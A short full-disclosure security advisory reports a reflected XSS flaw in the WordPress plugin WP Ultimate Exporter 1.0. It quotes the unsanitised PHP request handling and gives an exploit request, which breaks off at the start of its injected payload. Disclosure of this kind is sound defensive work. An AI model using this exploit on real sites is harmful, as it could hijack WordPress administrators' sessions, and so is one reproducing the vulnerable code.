## FULL DISCLOSURE #Product : WP Ultimate Exporter #Exploit Author : Rahul Pratap Singh #Version : 1.0 #Home page Link : https://wordpress.org/plugins/wp-ultimate-exporter/ #Website : 0x62626262.wordpress.com #Linkedin : https://in.linkedin.com/in/rahulpratapsingh94 #Date : 24/Feb/2016 XSS Vulnerability: ---------------------------------------- Description: ---------------------------------------- "export_name" and "export_post_type_name" parameters are not sanitized that leads to Reflected XSS. ---------------------------------------- Vulnerable Code: ---------------------------------------- File Name: /wp-ultimate-exporter/includes/WUExporterUI.php Found at line:88 $export_post_type = isset($_REQUEST['export_name']) ? $_REQUEST['export_name'] : '' ; Found at line:89 $custom_post = isset($_REQUEST['export_post_type_name']) ? $_REQUEST['export_post_type_name'] : '' ;?> Found at line:91 Found at line:92 ---------------------------------------- Exploit: ---------------------------------------- POST /wp-admin/admin.php?page=wp_ultimate_exporter&step=exportposttype export_name="/>